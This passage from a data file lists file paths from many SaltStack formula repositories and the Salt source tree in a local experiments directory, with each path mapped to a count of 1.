'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/auth/ldap': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/auth/pam': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/auth/stormpath_mod': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/client/ssh/shell': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/client/ssh/wrapper/grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/client/ssh/wrapper/pillar': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/cloud/clouds': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/cloud/exceptions': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/crypt': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/exceptions': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/ext': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/grains/external_ip': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/grains/extra': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/grains/opts': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/loader': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/log': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/log/handlers/logstash_mod': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/log/handlers/sentry_mod': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/log/mixins': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/log/setup': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/cp': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/daemontools': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/data': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/debconfmod': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/defaults': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/dpkg': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/event': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/extfs': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/key': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/mine': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/network': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/pillar': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/pkg_resource': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/pkgutil': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/ps': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/puppet': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/rbenv': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/ret': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/rpm': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/rvm': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/shadow': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/status': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/sysmod': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/modules/test': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/highstate': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/json_out': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/key': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/nested': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/no_out': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/no_return': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/overstatestage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/pprint_out': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/raw': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/txt': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/virt_query': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/output/yaml_out': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/overstate': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/payload': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/pillar': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/pillar/cmd_json': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/pillar/cmd_yaml': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/pillar/cobbler': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/pillar/django_orm': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/pillar/git_pillar': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/pillar/hiera': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/pillar/libvirt': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/pillar/mongo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/pillar/mysql': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/pillar/pillar_ldap': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/pillar/puppet': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/renderers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/renderers/jinja': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/renderers/json': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/renderers/mako': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/renderers/py': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/renderers/wempy': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/runners': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/runners/cloud': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/runners/error': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/runners/fileserver': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/runners/git_pillar': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/runners/launchd': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/runners/mine': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/runners/network': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/chef': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/file': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/fs': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/gem': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/git': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/group': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/host': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/locale': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/lvm': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/module': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/mount': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/npm': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/pecl': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/puppet': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/quota': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/rvm': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/saltmod': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/service': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/stateconf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/status': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/supervisord': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/timezone': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/user': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/states/virtualenv_mod': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/syspaths': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/template': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/transport': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/atomicfile': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/context': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/debug': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/decorators': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/dictupdate': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/error': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/filebuffer': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/gzip_util': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/ipaddr': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/mako': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/master': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/minions': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/nb_popen': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/network': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/odict': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/process': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/reclass': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/schedule': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/templates': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/thin': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/timed_subprocess': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/validate': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/validate/net': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/validate/path': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/validate/user': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/verify': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/virt': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/vops': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/vt': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/utils/xmlutil': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/version': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/wheel/config': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/wheel/error': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/wheel/file_roots': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/MadeiraCloud_salt/sources/salt/wheel/pillar_roots': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/NVSeismoLab_antelope-formula/_modules/antelope': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/NVSeismoLab_antelope-formula/antelope/python/files/sitecustomize': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Pexeso_pypack-formula/_states/pypack': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Pexeso_pypack-formula/_states/pypack/exceptions': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Psycojoker_dawdaw/dawdaw': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Psycojoker_dawdaw/dawdaw/magic': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Psycojoker_dishes/base': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Psycojoker_dishes/dishes': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Psycojoker_dishes/dishes/settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Psycojoker_dishes/formulas': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Psycojoker_dishes/formulas/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Psycojoker_dishes/formulas/views': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/Psycojoker_dishes/manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/RobSpectre_salt-states/sentry/sentry.conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/RobSpectre_salt-states/votr/initialize_votr_database': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/SS-archive_salt-states/_grains/test_grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/SS-archive_salt-states/_modules/foo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/SS-archive_salt-states/saltsrc/py_render': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/SmartReceipt_salt_state/_grains/instance': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/StartledPhoenix_saltstack-syncthing/_grains/syncthing': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/StephenPCG_vim-snippets-salt/gen-snippets': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/TheRealBill_salt-modules/lxc': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/UfSoft_salgema/salgema': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/UtahDave_salt-pi/pi': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/VertigoRay_salt-osx-dsconfigad/dsconfigad': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/WJIAN_salt_range/salt_range': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/WJIAN_sysinfo/sysinfo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aaae_saltstack_web/saltstack/accounts': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aaae_saltstack_web/saltstack/accounts/models': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aaae_saltstack_web/saltstack/accounts/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aaae_saltstack_web/saltstack/accounts/views': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aaae_saltstack_web/saltstack/manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aaae_saltstack_web/saltstack/saltstack': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aaae_saltstack_web/saltstack/saltstack/settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aboe76_packer_salt-states_testing/salt/_grains/test_grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aboe76_packer_salt-states_testing/salt/_modules/foo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aboe76_packer_salt-states_testing/salt/saltsrc/py_render': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/acieroid_salt-states/_modules/ezjail': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/acieroid_salt-states/_states/freebsdconf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aexeagmbh_django_saltstack/django_saltstack/django_saltstack': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aexeagmbh_django_saltstack/django_saltstack/django_saltstack/settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aexeagmbh_django_saltstack/django_saltstack/django_saltstack/settings/base': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aexeagmbh_django_saltstack/django_saltstack/main': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aexeagmbh_django_saltstack/django_saltstack/main/migrations': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aexeagmbh_django_saltstack/django_saltstack/manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aexeagmbh_django_saltstack/docs': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aexeagmbh_django_saltstack/docs/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ahale_salt-playground/playground/_modules/firewall': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ahale_salt-playground/playground/_modules/swiftutils': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ahale_salt-playground/playground/_states/loopbackdisk': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/akoumjian_shaker/docs/_themes/flask_theme_support': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/akoumjian_shaker/shaker/log': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/akoumjian_shaker/shaker/version': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/alexclear_salt-states-graphite-statsd-gdash/graphite/local_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/anderbubble_salt-states-firewall/_states/firewall_rule': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/astral1_vagrant-salt-test/salt/modules/pillar/rethinkdb_ext': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/astral1_vagrant-salt-test/salt/roots/_grains/mac_address': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/astral1_vagrant-salt-test/salt/roots/_grains/rethinkdb_grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/astral1_vagrant-salt-test/salt/roots/_modules/rethinkdb': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/astral1_vagrant-salt-test/salt/roots/_returners/rethinkdb_returner': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/atbell_salt-consul/_modules/consul_mod': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/atbell_salt-consul/_states/consul_check': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/atbell_salt-consul/_states/consul_kv': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/atbell_salt-consul/_states/consul_service': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/auser_states/states/_modules/informer': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/auser_states/states/_modules/linux_netstat': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/auser_states/states/_states/deploy': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/auser_states/states/_states/private_git': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/balamurugana_salt-gluster/gluster': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/_grains/ec2_info': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/_modules/elasticsearch_plugins': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/_returners/sentry_return': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/_states/archive': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/_states/aws_route53': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/_states/dnsimple': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/_states/elasticsearch_plugins': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/_states/pkg_file': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/apt/check': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/backup/server/check': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/elasticsearch/check': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/firewall/check': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/nrpe/check': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bechtoldt_salt-modules/_modules/datetimeutil': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/blast-hardcheese_blast-salt-states/_modules/blast': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bonJoeV_salt-states/files/bin/nacl': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/borgstrom_nacl/nacl': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/borgstrom_nacl/nacl/state': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/borgstrom_nacl/salt_renderer/nacl_renderer': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/borgstrom_nacl/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bossjones_salt-scarlett/salt/roots/salt/django/base': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/brutasse_states/_states/envdir': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/cedwards_SaltConf-2014/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/cgallemore_djvasa/djvasa': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/cgallemore_djvasa/djvasa/templates': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/cloudify-cosmo_cloudify-saltstack-plugin/main': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/cloudify-cosmo_cloudify-saltstack-plugin/main/saltapimgr': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/cloudify-cosmo_cloudify-saltstack-plugin/main/saltapimgr/exceptions': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/cloudify-cosmo_cloudify-saltstack-plugin/main/validation': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/conjurdemos_salt-stack-ssh/eventlisten': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/conjurdemos_salt-stack-ssh/srv/runners/conjur_register': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/conjurdemos_salt-stack-ssh/srv/runners/debug': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/corywright_salt-pillar-overlay-bug/salt/_grains/region': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/cro_salt-proxy-rest/rest': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/d1rk_salt/salt/_modules/ufw': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/d1rk_salt/salt/_states/augeas': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/d1rk_salt/salt/_states/ufw': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dangerousbeans_salt_states/_grains/test_grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dangerousbeans_salt_states/_modules/foo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dangerousbeans_salt_states/saltsrc/py_render': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/davechina_SaltStack/_modules/myTest': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/davechina_SaltStack/_modules/serveragent': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/davechina_SaltStack/_states/agentservice_state': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/daviddyball_salt/salt/_modules/jinja_renderer': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/daviddyball_salt/salt/_returners/salt-logger_return': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/daviddyball_salt/salt/_states/jinja': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dgilm_salt-states-alienvault/_grains/alienvault': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dgilm_salt-states-alienvault/_modules/alienvault': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dhmsbr_salt-stack-remedy/doc/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dhmsbr_salt-stack-remedy/saltcloud/clouds': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dhmsbr_salt-stack-remedy/saltcloud/clouds/ibmsce': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dhmsbr_salt-stack-remedy/saltcloud/config': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dhmsbr_salt-stack-remedy/saltcloud/exceptions': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dhmsbr_salt-stack-remedy/saltcloud/output': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dhmsbr_salt-stack-remedy/saltcloud/version': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dkilcy_juno-saltstack/states/openstack/_grains/openstack_ip_assignments': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dzderic_chicken-salt/salt_master_monkey': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dzderic_salt-in-the-middle/middleman': 1,
